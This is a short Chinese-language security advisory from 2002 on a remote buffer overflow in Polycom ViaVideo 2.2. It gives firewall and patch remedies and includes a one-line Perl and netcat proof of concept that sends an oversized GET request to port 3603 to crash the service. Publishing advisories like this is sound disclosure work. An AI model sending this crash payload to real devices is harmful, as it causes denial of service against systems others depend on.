Polycom ViaVideo存在缓冲溢出发布时间:2002-10-21 更新时间:2002-10-21 严重程度:中 威胁程度:读取受限文件 错误类型:边界检查错误 利用方式:服务器模式 BUGTRAQ ID:5964 受影响系统 Polycom ViaVideo 2.2详细描述 ViaVideo存在远程缓冲溢出。 通过发送超长’GET‘请求给ViaVideo设备,可导致'vvws.dll'库产生错误,使ViaVideo服务崩溃,产生拒绝服务。 测试代码 perl -e 'print "GET " . "A" x 4132 . " HTTP/1.0\r\n\r\n";' | netcat 10.1.0.1 3603 解决方案 Polycom建立使用防火墙关闭TCP 3603口的访问,如果不使用WEB接口,使用如下菜单清除密码: System Information --> Setup --> Global Services --> Global Management 升级程序: Polycom ViaVideo 2.2: Polycom Patch WebSecurityUpdate.zip http://www.polycom.com/securitycenter Polycom ViaVideo 3.0: Polycom Patch WebSecurityUpdate.zip http://www.polycom.com/securitycenter 相关信息 advisory@prophecy.net.nz. 参考:http://online.securityfocus.com/archive/1/295146 相关主页:http://www.polycom.com/ |
